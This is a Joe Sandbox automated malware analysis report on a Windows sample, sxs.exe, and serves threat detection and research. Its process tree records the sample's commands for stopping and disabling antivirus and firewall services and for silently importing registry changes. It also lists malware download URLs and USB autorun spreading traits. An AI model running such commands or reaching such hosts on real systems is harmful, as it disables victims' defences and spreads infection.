Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sxs.exe

Overview

General Information

Sample name:sxs.exe
Analysis ID:1501290
MD5:4f89e3a88853265154e24969581fb45a
SHA1:d5ae12cfe50ac91702da2ccd4e21321ef256ea2a
SHA256:ee77a17f0c1ff00fb7eb9a453ec22bb63ae382256211b6aa5db67c48e52fed73
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Changes autostart functionality of drives
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses regedit.exe to modify the Windows registry
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to search for IE or Outlook window (often done to steal information)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Explorer Process Tree Break
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses net.exe to stop services

Classification

Process Tree

  • System is w10x64
  • sxs.exe (PID: 4284 cmdline: "C:\Users\user\Desktop\sxs.exe" MD5: 4F89E3A88853265154E24969581FB45A)
    • iexplore.exe (PID: 5540 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" MD5: CFE2E6942AC1B72981B3105E22D3224E)
    • explorer.exe (PID: 4080 cmdline: "C:\Windows\System32\explorer.exe" http://www.onefordvd.com MD5: DD6597597673F72E10C9DE7901FBA0A8)
    • wuauclt.exe (PID: 4764 cmdline: "C:\Windows\wuauclt.exe" MD5: 4F89E3A88853265154E24969581FB45A)
      • explorer.exe (PID: 7844 cmdline: "C:\Windows\System32\explorer.exe" http://www.onefordvd.com MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • regedit.exe (PID: 7860 cmdline: "C:\Windows\System32\regedit.exe" /s C:\Windows\noruns.reg MD5: BD63D72DB4FA96A1E0250B1D36B7A827)
      • net.exe (PID: 7888 cmdline: "C:\Windows\System32\net.exe" stop sharedaccess MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8160 cmdline: C:\Windows\system32\net1 stop sharedaccess MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • net.exe (PID: 7916 cmdline: "C:\Windows\System32\net.exe" stop KVWSC MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 6764 cmdline: C:\Windows\system32\net1 stop KVWSC MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • sc.exe (PID: 7956 cmdline: "C:\Windows\System32\sc.exe" config KVWSC start= disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7980 cmdline: "C:\Windows\System32\net.exe" stop KVSrvXP MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 1628 cmdline: C:\Windows\system32\net1 stop KVSrvXP MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • sc.exe (PID: 8012 cmdline: "C:\Windows\System32\sc.exe" config KVSrvXP start= disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 8072 cmdline: "C:\Windows\System32\net.exe" stop kavsvc MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8208 cmdline: C:\Windows\system32\net1 stop kavsvc MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • sc.exe (PID: 8088 cmdline: "C:\Windows\System32\sc.exe" config kavsvc start= disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8140 cmdline: "C:\Windows\System32\sc.exe" config RsRavMon start= disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 8172 cmdline: "C:\Windows\System32\net.exe" stop RsCCenter MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8256 cmdline: C:\Windows\system32\net1 stop RsCCenter MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • sc.exe (PID: 7792 cmdline: "C:\Windows\System32\sc.exe" config RsCCenter start= disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7452 cmdline: "C:\Windows\System32\net.exe" stop RsRavMon MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8296 cmdline: C:\Windows\system32\net1 stop RsRavMon MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
  • explorer.exe (PID: 6972 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 662F4F92FDE3557E86D110526BB578D5)
    • chrome.exe (PID: 2260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 4040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2068,i,10012621105845313477,5144001626182359971,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • explorer.exe (PID: 7904 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 662F4F92FDE3557E86D110526BB578D5)
    • chrome.exe (PID: 8324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 8540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2004,i,8456847473545843836,6778845690688114268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • wuauclt.exe (PID: 9132 cmdline: "C:\Windows\wuauclt.exe" MD5: 4F89E3A88853265154E24969581FB45A)
    • iexplore.exe (PID: 7960 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" MD5: CFE2E6942AC1B72981B3105E22D3224E)
    • explorer.exe (PID: 8216 cmdline: "C:\Windows\explorer.exe" http://www.dvdforone.com MD5: 662F4F92FDE3557E86D110526BB578D5)
  • explorer.exe (PID: 7984 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 662F4F92FDE3557E86D110526BB578D5)
    • chrome.exe (PID: 7360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.dvdforone.com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2028,i,12403838513569625985,14954567300867270703,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Explorer Process Tree Break
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber: Data: Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 752, ProcessCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ProcessId: 6972, ProcessName: explorer.exe
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\wuauclt.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\sxs.exe, ProcessId: 4284, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft
Sigma detected: Net.exe Execution
Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "C:\Windows\System32\net.exe" stop sharedaccess, CommandLine: "C:\Windows\System32\net.exe" stop sharedaccess, CommandLine|base64offset|contains: ), Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Windows\wuauclt.exe" , ParentImage: C:\Windows\wuauclt.exe, ParentProcessId: 4764, ParentProcessName: wuauclt.exe, ProcessCommandLine: "C:\Windows\System32\net.exe" stop sharedaccess, ProcessId: 7888, ProcessName: net.exe
Sigma detected: Stop Windows Service Via Net.EXE
Source: Process startedAuthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\net.exe" stop sharedaccess, CommandLine: "C:\Windows\System32\net.exe" stop sharedaccess, CommandLine|base64offset|contains: ), Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Windows\wuauclt.exe" , ParentImage: C:\Windows\wuauclt.exe, ParentProcessId: 4764, ParentProcessName: wuauclt.exe, ProcessCommandLine: "C:\Windows\System32\net.exe" stop sharedaccess, ProcessId: 7888, ProcessName: net.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: sxs.exeAvira: detected
Antivirus detection for URL or domain
Source: http://www.om7890.com/mfx/help.exeAvira URL Cloud: Label: malware
Source: http://w.tw7890.com/Avira URL Cloud: Label: malware
Source: http://www.tw7890.com/twv/help.exehttp://www.om7890.com/mfx/help.exehttp://www.hg7890.com/hgb/help.eAvira URL Cloud: Label: malware
Source: http://www.tw7890.com/twv/help.exeAvira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Windows\wuauclt.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Multi AV Scanner detection for dropped file
Source: C:\Windows\wuauclt.exeReversingLabs: Detection: 91%
Multi AV Scanner detection for submitted file
Source: sxs.exeReversingLabs: Detection: 91%
Machine Learning detection for dropped file
Source: C:\Windows\wuauclt.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: sxs.exeJoe Sandbox ML: detected
Source: https://www.onefordvd.com/landerHTTP Parser: No favicon
Source: https://www.onefordvd.com/landerHTTP Parser: No favicon
Source: https://www.onefordvd.com/landerHTTP Parser: No favicon
Source: https://www.onefordvd.com/landerHTTP Parser: No favicon
Source: sxs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:53808 version: TLS 1.0
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:53760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:53773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:53799 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:53809 version: TLS 1.2

Spreading

barindex
Changes autostart functionality of drives
Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer NoDriveTypeAutoRun
Source: C:\Windows\wuauclt.exeFile opened: z:
Source: C:\Windows\wuauclt.exeFile opened: y:
Source: C:\Windows\wuauclt.exeFile opened: x:
Source: C:\Windows\wuauclt.exeFile opened: w:
Source: C:\Windows\wuauclt.exeFile opened: v:
Source: C:\Windows\wuauclt.exeFile opened: u:
Source: C:\Windows\wuauclt.exeFile opened: t:
Source: C:\Windows\wuauclt.exeFile opened: s:
Source: C:\Windows\wuauclt.exeFile opened: r:
Source: C:\Windows\wuauclt.exeFile opened: q:
Source: C:\Windows\wuauclt.exeFile opened: p:
Source: C:\Windows\wuauclt.exeFile opened: o:
Source: C:\Windows\wuauclt.exeFile opened: n:
Source: C:\Windows\wuauclt.exeFile opened: m:
Source: C:\Windows\wuauclt.exeFile opened: l:
Source: C:\Windows\wuauclt.exeFile opened: k:
Source: C:\Windows\wuauclt.exeFile opened: j:
Source: C:\Windows\wuauclt.exeFile opened: i:
Source: C:\Windows\wuauclt.exeFile opened: h:
Source: C:\Windows\wuauclt.exeFile opened: g:
Source: C:\Windows\wuauclt.exeFile opened: f:
Source: C:\Windows\wuauclt.exeFile opened: e:
Source: C:\Windows\explorer.exeFile opened: c:
Source: sxs.exeBinary or memory string: \autorun.inf
Source: sxs.exeBinary or memory string: [AutoRun]
Source: sxs.exe, 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: \autorun.inf
Source: sxs.exe, 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: [AutoRun]
Source: sxs.exe, 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: [AutoRun]
Source: wuauclt.exeBinary or memory string: \autorun.inf
Source: wuauclt.exeBinary or memory string: [AutoRun]
Source: wuauclt.exe, 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: \autorun.inf
Source: wuauclt.exe, 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: [AutoRun]
Source: wuauclt.exe, 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: [AutoRun]
Source: wuauclt.exeBinary or memory string: \autorun.inf
Source: wuauclt.exeBinary or memory string: [AutoRun]
Source: wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: \autorun.inf
Source: wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: [AutoRun]
Source: wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: [AutoRun]
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00404C8C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_00404C8C
Source: C:\Windows\wuauclt.exeCode function: 4_2_00404C8C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,4_2_00404C8C
Source: C:\Windows\wuauclt.exeCode function: 42_2_00404C8C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,42_2_00404C8C
Source: Joe Sandbox ViewIP Address: 104.26.2.70 104.26.2.70
Source: Joe Sandbox ViewIP Address: 172.67.69.19 172.67.69.19
Source: Joe Sandbox ViewIP Address: 15.197.204.56 15.197.204.56
Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:53808 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004080C8 DeleteUrlCacheEntry,DeleteUrlCacheEntry,DeleteFileA,DeleteFileA,URLDownloadToFileA,DeleteUrlCacheEntry,0_2_004080C8
Source: global trafficHTTP traffic detected: GET /lander HTTP/1.1Host: www.onefordvd.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: http://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tag?o=5097926782615552&upapi=true HTTP/1.1Host: btloader.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adsense/domains/caf.js?abp=1&gdabp=true HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1Host: ad-delivery.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&e=0.7379176731179411 HTTP/1.1Host: ad-delivery.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tag?o=5097926782615552&upapi=true HTTP/1.1Host: btloader.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adsense/domains/caf.js?abp=1&gdabp=true HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&e=0.7550573385120041 HTTP/1.1Host: ad-delivery.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1Host: ad-delivery.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "ad4b0f606e0f8465bc4c4c170b37e1a3"If-Modified-Since: Wed, 05 May 2021 19:25:32 GMT
